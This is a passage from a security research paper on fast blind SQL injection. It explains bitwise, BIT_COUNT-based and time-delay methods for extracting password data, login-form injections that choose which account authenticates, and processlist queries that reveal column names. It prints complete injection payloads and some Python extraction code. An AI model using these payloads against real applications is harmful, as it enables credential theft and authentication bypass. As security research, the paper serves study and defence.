[05-04-2021]

	High Speed Methods For Blind SQL Injections

			Ruben Piña
			http://nzt-48.org
			@tr3w_


Abstract
========
This paper presents optimization methods for
exceptionally fast information extraction with blind SQL injections. These
methods involve implementing a wide variety of ideas such as using
inferential algorithms that request only certain fragments of the
information and deduce the missing data (which work 100% of the time
with any given data-type), decision-making algorithms, techniques for
avoiding the use of semaphores in multiple thread execution contexts,
injections that reach and extract data right away without the need to know
the names of the tables and columns of the database schema, tricks for
obtaining multiple values of information at once with only 1 blind request
and a new authentication bypass technique.

Implementing these methods within carefully crafted code has resulted in the
development of the fastest tools in the planet to extract information through
Blind SQL Injection vulnerabilities. These tools are around 100% faster than the
currently most popular tool (sqlmap). The nature of such attack vectors will be
explained in this paper, including all of their intrinsic details.

Keywords: Web Application Security, Blind SQL Injection, Optimization


1. Introduction
================
Usually, extracting data from a database
through blind SQL injections requires performing a high number of requests,
which results in a time-consuming task. This paper will focus on thoroughly
optimized injection methods that accelerate the data extraction process.
The objective is to change and evolve the different kinds of classic
injections and discover better ones.

For instance, the most popular tool for extracting information through SQL
Injections, sqlmap, takes around 5 seconds to retrieve ten 32-byte
hashed password. In contrast, one of the methods explained in this paper
takes less than 1 second to retrieve the same information. Another method
explained in this text takes more or less 3 seconds. The inner workings of
these new extraction techniques are explained in this document.


2. Attack vectors
==================

2.1 Overview of methods that have been documented so far

2.1.1. Bisection, the most used method so far.

One of the most used techniques to extract information from a
database using blind SQL injection attacks is the bisection method. This
technique makes use of a binary search algorithm with which is possible to
retrieve any character within the ASCII range with a maximum of 7 requests,
according to the sqlmap documentation [1]. To extract a character within
the UTF-8 Latin range it would take a maximum of 8 requests.

This method has threading limitations because the requests must be
performed in a sequential manner; in order to know how to forge the
following request the attacker needs to know what was the result of the
previous request. For this reason, implementing threads in the extraction
tool is always limited because there are always requests that can’t be
performed in a parallel fashion.


2.1.2. The change of paradigm

Usually, performing blind SQL injections relies on guesswork that gathers
Boolean responses from the vulnerable application in order to narrow down
the possibilities of what the desired character might be.

A very useful paradigm to optimize this old technique is the realization
that everything inside the machine is binary. From the same perspective, it
can be concluded that all the information stored in the computer is, in
essence, Boolean. So instead of trying to guess what the character might
be, it is easier to convert all the information into its binary
representation and then just ask directly for TRUE and FALSE answers bit
by bit. Bits which are set are equal to TRUE responses and unset bits are
the equivalence of FALSE responses. By gathering all of these Boolean
responses, it is possible to reconstruct the exact bit strings used to
represent each character of the information desired to be extracted.

This idea of extracting information in its binary representation can be
implemented in many different ways, as demonstrated in various blog posts
and text files[3][4][5][6], but it is not known who came up with this idea.


2.1.3. sql-anding, former fastest method for boolean blind SQL injections

Back in 2013, new SQL Injection optimization techniques were presented in
Black Hat USA by Roberto Salgado[8]. One of these techniques was created by
me. It would be helpful to explain this technique in order to yield a better
comprehension of the new methods explained later in further sections.

The code of the injection is the following:

	1 AND (SELECT ASCII(MID(password, n, 1))FROM users LIMIT 1) & %d 

The first thing this injection does is to select a single character from
the desired value to extract by using the MID function. The next thing done
by this injection is to convert the selected character to its ASCII numeric
value by using the ASCII function. The last part of the injection performs
an AND bitwise operation against %d, a placeholder that will iterate
through 7 different values:
            
		%d = [ 1, 2, 4, 8, 16, 32, 64 ]

The binary representations of these values are the following:

		  1 = 00000001
		  2 = 00000010
		  4 = 00000100
		  8 = 00001000
		 16 = 00010000	
		 32 = 00100000
 		 64 = 01000000
		128 = 10000000

Since all of these numbers are powers of 2, all the bits are unset except
for only one bit that is set and shifts its position to the left with each
different value.  The desired character to extract (being ‘a’ in this case,
with a binary value of 01100001) is used to perform an AND bitwise
operation with each one of the previously listed powers of 2:


	01100001    01100001    01100001    01100001
	00000001    00000010	00000100    00001000
	========    ========    ========    ========        
	00000001    00000000    00000000    00000000
	 = TRUE      = FALSE     = FALSE    = FALSE


	01100001    01100001    01100001    01100001
	00010000    00100000	01000000    10000000
	========    ========    ========    ========      
	00000000    00100000    01000000    00000000
	= FALSE     = TRUE     = TRUE       = FALSE


If the vulnerable page responds with a TRUE response, then the bit being
tested is equal to 1. If it is FALSE, the bit is equal to 0. By iterating
through the mentioned powers of 2 and gathering the Boolean responses, all
the bits which represent the desired character can be determined and used
to reconstruct the bit string of the data being extracted.

If it is known that the character being retrieved is contained in the ASCII
range, only 7 requests need to be done because, for the ASCII range, the
most significant bit is always 0.  This technique has a huge advantage: in
contrast to the bisection method, each bit can be retrieved regardless if
the other bits are known or not, which means that these injections can be
performed using threads to retrieve all the character’s bits at the same
moment. This is the reason of why the sql-anding tool is much faster than
other tools that use the binary search algorithm. There is already a recorded
demo of this technique, publicly available to watch [7].

The query also runs faster in the DBMS since this injection uses bitwise
operations instead of the BETWEEN instruction (used by the binary search
algorithm). 


2.1.4. Avoiding the need to use semaphores in multiple thread execution for
maximum speed

Retrieving information using the sql-anding technique is very fast if
multiple threads are implemented in the extraction tool. Since 7 bits must
be extracted to retrieve 1 character, sql-anding.py uses exactly 7 threads
to simultaneously fetch each individual bit so that the entire bitstring is
found in an instant. The 7 extracted bits need to be joined together in a
single variable, so a semaphore would be required because the variable
would be accessed simultaneously by multiple execution threads which could
cause interference conflicts.  However, the need to use a semaphore can be
avoided, as demonstrated in the following code used in sql-anding.py:

-------------------------------------------------------------------

	powers_of_two = [       0b0000001,
				0b0000010,
				0b0000100,
				0b0001000,
				0b0010000,
				0b0100000,
				0b1000000 
			]

	injection = "1 AND(SELECT ASCII(MID(password,1,1)) & %d FROM users
	LIMIT 0,1)" % (powers_of_two[i])

	result = inject(injection) bit = 1 if result else 0

	global bitstring
	if bit: bitstring = bitstring | powers_of_two[i]

--------------------------------------------------------------------


The array named powers_of_two[] is used in the injection to determine the
value of each bit being extracted. The variable bitstring is where the
retrieved bits are stored.

Normally, a semaphore would need to be used in order to alter the bitstring
variable because the simultaneous access to the same variable by different
execution threads could cause problems. However, since each thread is meant
to retrieve and store only 1 particular bit located in a different position
than all of the other bits, multiple bitwise OR operations can be performed
simultaneously with the same bitstring variable because the powers of two
only affect 1 bit at a time and not the others; each thread only changes
one particular bit without affecting the bits used by other threads.

Without the pauses made by a semaphore, the speed of the algorithm can be
increased.


2.1.5. Overview of pos2bin method

pos2bin is another method which implements the idea of working with bits to
extract information in a faster way. It was presented in Black Hat USA 2013
by Roberto Salgado [8]. For the sake of brevity, this method won’t be
explained, but its functioning can be found in the slides used for the
presentation [8].

Even though this method is very efficient, it has some constraints that
make it inconvenient in certain situations. The main optimization idea used
in this technique is to use reduced character sets to discard rarely used
values so that the chances of finding commonly used characters is increased
since not all characters are expected to be found in the data being
extracted. This is highly useful when it is known that only digits or
hexadecimal characters are expected. The problem is that if you want to
consider the capability of finding any possible character, such as japanese,
chineses, russian, korean, arabic or any other extense alphabet set (which
coud include the latin alphabet as well), the character set becomes larger,
which means that the idea behind the optimization of this technique becomes
useles.

Furthermore, another bold inconvenience of this technique is that for it to
work, the server must be able to respond not only with a TRUE or FALSE response,
but also with an ERROR response. So this is not a strictly boolean
injection since 3 different types of content are needed to perform the
extraction, which might make it impossible for it to work in some
applications. 


2.2 Explanation of new extraction methods

2.2.1 Duality: optimization of bit-based blind SQL injection methods

The purpose of duality.py is to be able to optimize the bit extraction
process without needing error-based responses. This is why it is possible
to use Duality in every single vulnerable application, in contrast to
pos2bin which doesn’t always work. Also, larger alphabets could be
extracted without performing a ridiculously big injection containing the
whole character set. Another difference Duality.py has in comparison with
most bit-based techniques is that, based in the non-linear sequence of how
some bits are requested, it is able to deduce the values of the remainding
bits which never have to be requested, reducing the amount of injections;
all 7-bits don’t need to be extracted. Sometimes it is even possible to
get some characters by extracting only 1 or 2 bits and then inferring the values of
the rest, getting exactly the correct strings 100% of the time. 

For maximum optimization, duality.py contains different decision-making
trees which are chosen depending on the character set of the data being
extracted, so that if a reduced character set is used (such as MD5 hashes),
the task can be completed much faster.


2.2.1.1 Extracting Numbers

It is going to be demonstrated how it is possible to extract a character by
knowing just 1 or 2 of its bits. The easier example to explain how Duality
does this is by assuming that the characters to be extracted contain only
numbers. The extraction strategy is the following:

The following table shows the binary representation of the ASCII values of
all the numeric characters:


	Numeric character	Binary representation
	---------------------------------------------
	0			0110000
	1			0110001
	2			0110010
	3			0110011
	4			0110100
	5			0110101
	6			0110110
	7			0110111
	8			0111000
	9			0111001
	

It is apparent that the first 3 bits of the binary strings are always the
same: ‘011’. Since this bitstring is present in all numbers, the first step
is to neglect it so that only the last 4 bits remain

Normally, each one of the 4 remaining bits would have to be extracted, but
Duality, reduces the number of bits needed.

This method starts by using the bitwise function BIT_COUNT() to determine
how many bits are set in the character being extracted. This information is
later used to decide what is the most optimum sequence to extract the bits
of the desired character.


	Numeric character	Binary		BIT_COUNT
	-------------------------------------------------
	0			0000		0
	1			0001		1
	2			0010		1
	3			0011		2
	4			0100		1
	5			0101 		2
	6			0110		2
	7			0111		3
	8			1000		1
	9			1001		2


By using BIT_COUNT(), it becomes possible to classify all the characters
into different groups depending on their quantity of set bits. This reduces
the number of possible bit combinations to be found.

For instance, if BIT_COUNT returns 3, it can be determined right away that
the numeric character is ‘7’, because it is the only number which has a
total of 3 set bits; only one request was made to find the character.

Continuing with the example, if BIT_COUNT returns a value of 1 instead, the
possibilities are reduced to the following characters:


	Numeric character	Binary representation		BIT_COUNT
	-----------------------------------------------------------------
	1			0001				1
	2			0010				1
	4			0100				1
	8			1000				1


A good strategy would be to test the most significant bit. If it is set,
then it would be revealed that the character is ‘8’, because it is the only
character in this BIT_COUNT group whose most significant bit is set. The
rest of the bits don’t need to be extracted anymore so only one more
request had to be made to retrieve the character. If the bit is unset, the
value ‘8’ can be discarded and the next step could be to test if the second
most significant bit is set, because the only bitstring of this group whose
second most significant bit is set is character ‘4’. This would reveal that
the character is ‘4’ without the need to extract the rest of the bits.  If
the character is not ‘8’ nor ‘4’, the possible values left are ‘0001’ and
‘0010’. By retrieving the value of just the last bit, it would be revealed
which one of these 2 remaining characters is the one being extracted.

The sequence of how the bits are tested depends on the character range of
the data wanted to be extracted. Duality’s code has multiple decision trees
for the different BIT_COUNTs in each different character range (digits, hex,
alpha, alnum, full-ascii). These decision-making trees have been optimized
for each one of these specific cases by determining which sequences are the
most likely to be encountered and what is the best way to identify unique
patterns in the bitstrings in order to select and discard the optimum
amount of bits. 


2.2.1.2 Dealing with words

When dealing with cases in which the data to be extracted consists of
letters only, several optimization ideas can be used.

The first thing to notice is that, for letter characters in the ASCII
range, the first two significant bits are always ‘10’. These two bits can
be removed from the bitstrings since their values are already known and
only 5 bits of the bitstring will remain.  The second thing to do is to use
BIT_COUNT to find out how many of the last 4 bits are set. For instance, if
the result of BIT_COUNT is 3, the possible characters would be reduced to the
following ones:


	Character	Binary representation		BIT_COUNT
	---------------------------------------------------------
	G		0 0111				3
	K		0 1011				3
	M		0 1101				3
	N		0 1110				3
	W		1 0111				3


It is evident that there is a sequence of bits that appears twice in the
table: ‘0111’ is used to represent the characters ‘G’ and ‘W’. Since this
is the only sequence that is repeated, it has the higher chance of
happening, so this is the first possibility that should be tested. It is
also evident that this sequence of bits is the only one whose second bit is
‘0’. This means that with only 1 request to extract the second bit, the 5
possibilities can be reduced to only 2 characters if the result is ‘0’, and
just 1 more request would be needed to determine if the value is ‘G’ or
‘W’.

This kind of logic can be used in every scenario to start testing for the
most probable values, and then finding bit sequences that distinguish these
characters from the rest to keep discarding the greatest amount of
possibilities until the character in question is found with the least
amount of requests.


2.2.1.3 Dealing with the full ASCII range

In situations when it is needed to deal with the full ASCII range, the
decision-trees must have routes to reach every possible combination of
bits, in contrast with the character class specific scenarios where
there are equal bit sequences at the start of the bitstrings.

The decision tree used when the BIT_COUNT is equal to 2 is the following
one:

                                .---------------------.
                                |   BIT_COUNT = 0x02  |
                                '---------------------'
                                          |
                                          |
        0 <------------------------------R2#0---------------------------------> 1
        |                                                                       |
        |                                                                       |
        v                                                                       v
        R2H ----> 1 ----> 000011                                                R2H#0
        |                                                                       |
        |                                                                       |
        v                                                       0 <-------------'-----> 1
        0                                                       |                       |
        |                                                       |                       |
        |                                                .-----R0#0 ----> 1             v
        v                                               |                 |             R0#0
        R1#0 ---------> 1                               |                 |             |
        |               |                               v                 v             |
        |               |                               R1L             R0L     0 <-----'--> 1
        v               v                       .-------' |             ||      |            |
        R1L             R1L                     v         |     0 <-----'|      v            |
        |               |                       0         v     |        v      R1L          v
        |               |                       |         1     |        1      |           R0L
        |        0 <----'---> 1                 |         |     |        |      |            |
    0 <-'---> 1  |            |                 v         v     |        v   0<-'-> 1        |
    |         |  |            |              001001     000101  |    010001  |      |        |
    |         |  v            v                                 |            |      |        |
    v         | R0L          R0L                                100001       |      |        |
   110000     |   |           |                                              |      |  0 <---|
              |   |           |                                              |      |  |     1
              |   |           |                                              v      |  |     |
          001100  |           |                                             001010  |  |     |
                  v           v                                                     |  |     v
                101000       011000                                                 v  | 010010
                                                                                000110 |
                                                                                       |
                                                                                       v
                                                                                     100010

The previous tree is used when the bitstring has 2 bits set. The tree
extracts specific pairs of bits and then, based on the results it gets,
other groups of bits are strategically selected with the objective of
finding the quickest path to extract each possible value.  When certain
routes of the tree are taken, other possibilities are discarded.

This also involves the idea of noticing which sequences of bits are repeated
the most to know the probability of what characters are more likely to occur.
This determine which bit-groups are more convenient to test first and next.


This table lists every possible binary representation of every ASCII value
whose BIT_COUNT is 2 (neglecting the most significant bit). The order in
which they are listed has been rearranged to better distinguish repeated
sequences, and they have been grouped in pairs:


                R0        R1        R2
                ----------------------
                00        11        00
                01        01        00
                01        10        00
                10        01        00
                10        10        00
                11        00        00
                00        01        01
                00        10        01
                01        00        01
                10        00        01
                00        01        10
                00        10        10
                01        00        10
                10        00        10
                00        00        11


It is possible to notice that the bit sequence that appears the most is 00.
Since it appears the same number of times in both R1 and R2 columns, one of
these two columns should be tested first. The # operator used in the binary
tree already shown basically converts every ‘11’ sequence into ‘00’ which
means that the probability of finding the 00 sequence is increased.

If the sequence found in R2 is indeed 00 (or 11), the possible values are
reduced to the following:

                R0        R1        R2
                ----------------------
                00        11        00
                01        01        00
                01        10        00
                10        01        00
                10        10        00
                11        00        00
                00        00        11


If R2 is not equal to 00, it means that the bitstring is 000011 because it
is the only possibility left. If this is not the case, the sequences of
groups R0 and R1 must be counted to see which values can be discarded next.
The order of all the possible values left can be rearranged again to make
it easier to  find the relevant values:


                R0        R1        R2
                ----------------------
                01        01        00
                10        01        00
                00        11        00
                01        10        00
                10        10        00


Group R0 is going to be tested next. If the extracted value is 00, it means
that the entire bitstring is 001100, the only possibility left. If it is
not, the remaining combinations in R0 are 10 and 01, by using one request
to find one of those bits, the value of the remaining bit becomes revealed
as well because both bits are mutually exclusive. This last step is
repeated once again to find the value of the pair in R1.

The core of the technique is to logically select specific groups of bits
to deduce others.

This table shows how many requests must be done for finding a character
with the previous example (neglecting the BIT_COUNT):


	--------------------------------
	2 requests:	1 possibility
	4 requests:	10 possibiilities
	5 requests:	4 possibilities
	----------------------------------


To emphasize the optimization it would be worth mentioning that sqlmap
takes always 7 requests to find a character. So the worst case scenario
of this method is even more convenient than sqlmap's best case scenario.


2.2.1.4 Binary Tree Inversion

This is an example of another optimization technique that can be used when
dealing with the full ASCII range. For instance. if the BIT_COUNT of a
character is equal to 4, then it means that the possibility of finding a
‘1’ is of 4/6 and the possibility of finding a ‘0’ is 2/6; it is more
probable to find a 1 than a 0, so in this specific case, looking for the
location of the bits which are set is faster than looking for zeroes.  If,
in contrast, the BIT_COUNT of a character is equal to 2, then the
possibility of finding a ‘1’ is equal to 2/6, meaning that it is more
likely to find the location of bits equal to ‘0’ (4/6).

To optimize the extraction process, the decision-tree used for when the
BIT_COUNT is 4 can also be used in situations when BIT_COUNT is 2. The
values of the bits should be inverted meaning that instead of having 4 bits
with a value of ‘0’, the bits are going to be inverted leaving a total of 4
bits with a value of ‘1’, this way the probability of finding bits that are
set will be increased, making the process faster and shorter, and once the
set bits are found, the bits of the entire string will be inverted once
again to obtain the original string of bits. In this way, the tree
structures can be reused in different scenarios, making the code shorter.

A quick test-case was made to determine the difference in requests and time
when a normal tree is used against when the tree is inverted:


	Method		Number of requests	Time
	--------------------------------------------------
	Normal tree	9090			71 seconds
	Tree inversion	8734			61 seconds


2.2.2. Bit superposition: returning 2 bits at once with only 1 injection

Since each blind injection can only result in 1 of 2 possible boolean
responses (TRUE or FALSE), it is assumed that it would be impossible to
have 4 possible sequences of bits (00, 01, 10, 11) and determine with only
1 boolean response which one of the four sequences is being selected.

Regardless of this belief, the author discovered a method for achieving
this. It is possible to retrieve more than 1 bit at a time with only 1
boolean request.

It works like this:

	?id=1 AND (CASE WHEN (@:=(select
	mid(bin(ascii(mid(password,1,1))),1,2) from usuarios limit 1))='00' THEN 0
	WHEN @='01' THEN 1 WHEN @='10' THEN (0 OR NOT SLEEP(0.5)) ELSE (1 AND NOT
	SLEEP(0.5)) END) 

If the bit sequence is ‘00’, the query returns FALSE. If the bit sequence
is ‘01’, the query returns TRUE. If the bit sequence is ‘10’, the query
returns FALSE but with a delay since a SLEEP is used. If the bit sequence
is ‘11’, the query returns TRUE after a delay because of the SLEEP
instruction. Even if the application can only reply with only 2 possible
responses, 4 possible bit sequences can be found with just 1 injection.

This technique has been implemented in duality.py for finding the number of
set bits in a character. As shown in the following table, it does save a
considerable amount of requests because the BIT_COUNT can be extracted with
just one injection. Statistics for pos2bin are also included because it was
the fastest method for a while.


	Test case:  5f4dcc3b5aa765d61d8327deb882cf99
	Method		Time		Requests
	-----------------------------------------------
	Duality		1 second	169 requests
	
	pos2bin		1 second	158 requests
	
	Duality with
	superposition	3  seconds	137 requests


	Test case: while i < 100: md5(i)
	Method		Time		Requests
	-----------------------------------------
	Duality		125 seconds	16344
	
	pos2bin		103 seconds	14816
	
	Duality with
	superposition	297 seconds	13693


2.2.3. Taking Advantage Of Non-Boolean Blind SQL Injections

OWASP (The Open Web Application Security Project) defines a blind SQL
injection as the following: “Blind SQL (Structured Query Language)
injection is a type of SQL Injection attack that asks the database true or
false questions and determines the answer based on the applications
response.”[8]

The most common example of such kind of security flaw is a vulnerable login
form that provides authentication functionality for a web application.
Attacking this type of component is generally considered blind because only
2 types of boolean responses are possible: the user either logs in, or not.

However, this paper presents a method to allow the data extraction process
to become blatantly faster.

Consider the following vulnerable code:


	$login = sql_query("SELECT * FROM users where user='$username'")


In addition to bypassing the login, this vulnerability allows querying
arbitrary data from the database by injecting logical operators into the
statement which result in TRUE or FALSE responses (access granted or access
denied) revealing information of the data being extracted.  Nevertheless,
the reality is that in most applications this isn’t a blind injection.
Consider the following SQL injection:


	' or user=(case when (@:=(select mid(password, 1, 1) from users
	limit 0,1))='A' then 'tr3w' when @='B' then 'hkm' when @='C' then 'lightos'
	end)#


It is possible to test multiple conditions in only 1 request which causes
the client to log in with different users depending on the result of the
conditions. By determining which user was authenticated, it is possible to
know which of the multiple condition was met.

This injection demonstrates that the application can respond with not only
one TRUE response, but actually multiple types of different TRUE responses.
By being able to login with different users, it is possible to gather
information faster by testing many conditions with just 1 request. This
expands the attack surface increasing the quantity of different responses
allowing to gather more information with only 1 injection.  The number of
possible conditions that can be used is limited by the amount of accounts
the attacker can create. 


2.2.4 Lightspeed for logins

It would be a waste of resources to create a lot of accounts to test as
many conditions as possible, not to mention the attack must first map every
character in the set with a different response from the server.

The method that will be presented in this section allows to retrieve big
amounts of information with only 3 accounts needed, in contrast to cycling
through the whole ASCII range which would need a total of 127 users.  This
is another implementation of the idea of converting the information into
its binary representation and work with the bits that compose each
extracted character. Think of the next collections of binary bits and their
corresponding representation in decimal:


	Binary bitstring	Decimal Representation
	----------------------------------------------
	00			0
	01			1
	10			2
	11			3


To perform this technique, the attacker must have control of 3 different
accounts. In most cases this is an easy requirement because the attacker
would just need to register 3 accounts with the same password. In cases
where only one account is allowed (or maybe even without access to an
account), the login makes it possible to take over 2 more accounts with
a bypass injection. Consider the following vulnerable login already showed
in the pr099407evious section of the document:


	$login = sql_query("SELECT * FROM users where user='$username'")


The injection to attack this component, looks like this:


	' or user=(case when(@:=(select mid(bin(mid(password, 1, 1),2,1)
	from users limit 0,1)) ='00' then 'tr3w' when @='01' then 'hkm' when @='10'
	then 'lightos' else '' end)#


This injection starts by breaking out of the quote delimiter, leaving the
column user with a blank string. Then, the character being extracted is
converted into its binary representation and its first two bits are
selected and stored in a variable (@).  The next thing to be done is to
test the variable with 4 different conditions. This means that all the
possible permutations of 2 bits (00, 01, 10, 11) are tested with only 1
request in total until the sequence is matched. Finally, by seeing which
account was authenticated, the sequence of bits is revealed. This process
can be repeated to extract the next pair of bits until the whole
binary string is reconstructed; the character is found with only 4
requests. If threads are used, the character can be retrieved in an
instant. Notice that even if the attacker is using only 3 accounts, a
fourth possibility can be tested thanks to the ELSE statement which
provides a default value for when none of the conditions are met, which
means that if the extracted set of bits is equal to '11', the login fails
but the bitstring is revealed anyways.


2.2.4.2 The column name limitation

It is important to mention that there is a relevant limitation when using
this injection. To make this clear, it would be useful to see again the
injection used by lightspeed:


	SELECT * FROM USERS WHERE user='' or user=(case when(@:=(select
	mid(bin(mid(password, 1, 1),2,1) from users limit 0,1))='00' then 'tr3w'
	when @='01' then 'hkm' when @='10' then 'lightos' else '' end)#'


The column 'user' is part of the original query, but an additional condition
for the same column must be injected by the attacker to specify which user
is going to be logged-in depending on the condition met. In many cases,
the attacker has no previous knowledge of what the column’s name may be.
This is a problem because the attacker must know its name in order to use
it in the injection.

One already-known solution to find the column name is to blindly exploit
the login mechanism to extract the column name one character at a time by
consulting  information_schema.columns.  This can take a lot of time
depending on the number of entries in the system tables. This is usually a
slow and cumbersome task. Regardless, Lightspeed can highly optimize this
process.


2.2.4.3 Fastest way to find the column name

For lightspeed to work, the name of the column used in the query must
be known in order to craft the injection. Lightspeed implements a fast
straight-forward approach to discover the column name: instead of iterating
through all the database entries in information_schema.tables for
determining which table contains the column of interest and then iterating
through all the entries in information_schema.columns to look for the
column name among enormous heaps of entries, it is possible to skip this
information gathering process and find out the column name right away with
no knowledge at all about the structure of the database and with a minimum
amount of requests, rendering the classic techniques slow and inefficient.

The author found a way to achieve this by combining the use of regular
expressions and subqueries to an esoteric table that was rarely used until
Roberto Salgado, wrote the first blog post that talked about this table.[10]
This is a screenshot of a query made to the just mentioned table:

        MariaDB [pwnage]> select info from information_schema.processlist;
        +-------------------------------------------------+
        | info                                            |
        +-------------------------------------------------+
        | select info from information_schema.processlist |
        | NULL                                            |
        | NULL                                            |
        | NULL                                            |
        | NULL                                            |
        | NULL                                            |
        +-------------------------------------------------+
        6 rows in set (0.049 sec)


It is easy to notice that the first row returned by the query, is the query
itself. This table doesn’t contain any other sensitive columns. But what if
the query is merged with another query that contains sensitive columns? The
concatenation of both queries would be displayed in the processlist table
and the names of sensitive columns will be disclosed.

Remember the vulnerable login query that has already been shown:


	SELECT user,password FROM USERS WHERE user='$username'


If this query is injected with a subquery that consults
information_schema.processlist, the whole SQL statement will be revealed
along with the column names used by the authentication mechanism.


        MariaDB [pwnage]> SELECT password FROM usuarios WHERE usuario=''
                        union select info from information_schema.processlist;
        +----------------------------------------------------------------------+
        | password                                                             |
        +----------------------------------------------------------------------+
        | SELECT password FROM usuarios WHERE usuario=''                       |
        | union select info from information_schema.processlist                |
        | NULL                                                                 |
        +----------------------------------------------------------------------+
        2 rows in set (0.002 sec)


It is necessary to have in mind that, since the vulnerability is blind and
the names of the resulting columns are not displayed in the content of the
page, it is not possible to directly read the result of the query, so blind
injection techniques must be used to extract these strings.  Sometimes the
columns needed by the attacker are not selected in the login query: 


	SELECT * FROM users WHERE user='$username'

                   
In this SQL statement, the names of the selected columns are not used
because the query is using the asterisk operator (*). This would mean that
the column names must be obtained from a different place. Because of this,
the first thing that the attacker must do is to figure out if the statement
is using an asterisk operator (*) or if it is using explicit column names.
The injection to do this looks like the following:


	SELECT * FROM USERS WHERE user='tr3w'
	and(select(trim(regexp_replace(regexp_substr( (select info from
	information_schema.processlist limit 0,1),
	'select[[:space:]]+(.*?)from'),'(select|from)',''))))='*'

               
The highlighted text shows that an injected subquery is consulting the info
column of the processlist table so that the whole query can be selected.
Next, the regular expression functions regexp_substr() and regexp_replace
are used to select the part of the query where the asterisk (or the list of
selected columns) would be found.  Finally, at the end of the injection, a
comparison is made to see if the selected content is an asterisk. If the
application responds with TRUE, it is revealed that an asterisk is used
indeed, meaning that the column names must be fetched from another place.
If a FALSE response is returned, then it becomes apparent that column names
can be extracted at the location matched by the regular expression. Then it
becomes easy to use blind-based injections (just like Duality or
sql-anding) to extract the column names with a minimum number of requests
because the rest of the query has been discarded and neglected by the
results of the regular expressions.

Nevertheless, in many applications, the username column is not selected by
the query, as in the following example:


	SELECT password FROM USERS WHERE user='$username'
     

Only the password column is being selected, which might be of interest
later on, but Lightspeed needs to know the name of the user column instead.
This means that the name of the column must be extracted from somewhere
else. The obvious place is after the WHERE keyword. The following injection
works just like the previous one, with the difference that it attempts to
fetch the column name from the conditional part of the query:


	SELECT password FROM USERS WHERE user='tr3w'
	and(select(trim(regexp_replace(regexp_substr((select info from
	information_schema.processlist limit 0,1),
	'where[[:space:]]+(.*?)[[:space:]=]+'), '(where|[[:space:]]|=)',''))))#'
        
       
Regular expressions are used to capture everything that is located between
the WHERE keyword and the equal comparison sign (=). Duality and sql-anding
can now be used to blindly extract the values captured by the regular
expression, in hope that the desired column name is in there.  Sometimes,
more injections would need to be done because the desired column name might
be located after a second or third (etc…) condition. The following
injection works exactly as the the previous two, with the difference that
it looks for the column name after AND clauses:


	SELECT password FROM USERS WHERE user='tr3w' and
	(select(trim(regexp_replace( regexp_substr((select info from
	information_schema.processlist limit 0,1),
	'and[[:space:]]+(.*?)[[:space:]=]+'),'(and|[[:space:]]|=)',''))))#'

                   
The column name the attacker needs might be found with the three injections
just shown, but to make the process as universal and complete as possible,
it is convenient to assume that there might be cases in which the user
column is not used in the query at all.  The following injection
demonstrates a method to extract the column name even if it is not being
used in the query and without knowing anything at all about the structure
of the database, directly reaching the group of desired columns with only
one injection:


	SELECT password FROM USERS WHERE user='tr3w' and(select
	group_concat(column_name)from information_schema.columns where
	table_name=(select(trim(regexp_replace(regexp_substr ((select info from
	information_schema.processlist limit 0,1),
	'from[[:space:]]+(.*?)+[[:space:]]'),'([[:space:]]|from|(.*?)\\.)','')))))#'

                   
The injection works by once again doing a subquery to
information_schema.processlist so that the application’s
original SQL statement can be selected. Regular expressions are
used to isolate the table name used by the authentication query.
Once the complete name of the table is selected and isolated, the only
thing left to do is to consult information_schema.columns with this selection.
At this point, the blind extraction process can begin to unveil the value of the
desired column. Notice that the group_concat() clause is used to extract all the
column names in a single row of results. An extra step taken by lightspeed is to
use regular expressions to see if common patterns of column names match the
query’s result. This can save a lot of requests because the values wouldn’t
have to be extracted one character at a time. The way to do this is by
simply using the REGEXP clause at the end of the query with common column
names:


	' and(select group_concat(column_name) from
	information_schema.columns where table_name
	=(select(trim(regexp_replace(regexp_substr((select info from
	information_schema.processlist limit
	0,1),'from[[:space:]]+(.*?)+[[:space:]]'),
	'([[:space:]]|from|(.*?)\\.)',''))))) regexp '(username|user|login|email)


If the application replies with a TRUE response, it means the regular
expression was matched and the column name can be rapidly extracted with
very few injections.  Now that the column name is known, it is possible to
launch lightspeed.py for fast data extraction through authentication mechanism.


2.2.5. Attack surface expansion methods

lightspeed.py makes it possible to accelerate the extraction process by
expanding the attack surface through the use of more available resources
(such as different user accounts) to test multiple conditions at once,
gathering more information per request as a result. This attack surface
expanding idea can be implemented not only in login forms but in other
components of the application as well. An online store is a good example of
this; in the same way multiple accounts can be used, displaying multiple
products stored in the database can also optimize the extraction process. A
technique for extracting characters with just one request in their complete
numeric representation has been around for some time now. The drawback of
this technique is that for the possibility of extracting any character in
the ASCII range, the online store must have at least 127 products so that
each product represents each possible character; not to mention that 127
requests need to be made before the attack begins in order to map every
character to its corresponding product.

In most online stores, a single static resource is used to display one of
many different products through the use of a GET parameter (such as an id)
which identifies the product. The URI of such component might look like the
following:


	/product.php?id=1
	/product.php?id=2
	/product.php?id=3


In vulnerable applications that work in this way, generally UNION SELECT
statements are injected in an attempt to display data that the application
is not meant to disclose. Nevertheless, if UNION statements are blocked,
filtered or ignored, it means that the information must be extracted using
blind SQL injection techniques, because it is impossible to explicitly read
the information being extracted. If there are only 3 products in the store,
this implies that in reality there are a total of 4 responses; applications
commonly respond with different content when an invalid id is supplied,
such as a division by zero. To begin the extraction, each different id
number must be represented as a set of 2 bits:


	?id=	Binary representation
	-----------------------------
	0 		00
	1		01
	2		10
	3		11


These binary representations are all the possible permutations of a pair of
bits.  The attack is prepared by requesting the content of these 3
different products and storing either the complete response or, to save
memory, a hash signature to represent it. Once these responses are
gathered, the attack can begin.

The traditional blind SQL injection is more or less structured in the following
way:


	?id=0 AND (SELECT…


The core of this classic injection is the AND conditional operator. But
what would happen if the conditional operator is replaced with a bitwise
operator? Here’s an example:


	?id=0 | (SELECT
	CONV(MID(LPAD(BIN(ASCII(MID(password,1,1))),8,'0'),1,3),2,10) FROM users
	LIMIT 1)


This injection uses an OR bitwise operator ( | ) and immediately after
there’s a subquery.  This subquery converts the value desired to extract
into its binary representation and its first 2 bits are selected. The next
step converts that pair of bits into its decimal representation and it is
bitwise-ORed with the value assigned to the id GET parameter (which is
zero).  The value of the id GET parameter will be changed by the result of
the bitwise operation, resulting in one of four different possibilities. By
seeing which product is displayed, the value of the first two bits of the
desired character are exposed. Then this process is repeated thrice with
the next pairs of bits; the entire UTF-8 value can be obtained with just 4
requests. Since the pairs of bits are independent from the others, the tool
can use threads to retrieve any character in an instant, without the use of
semaphores (section 2.4), and with only 3 products in the database.


2.2.6. AND instead of OR

If for some reason the bitwise OR cannot be used, an AND bitwise operation
(&) works if the value assigned the GET parameter is equal to 3; it has all
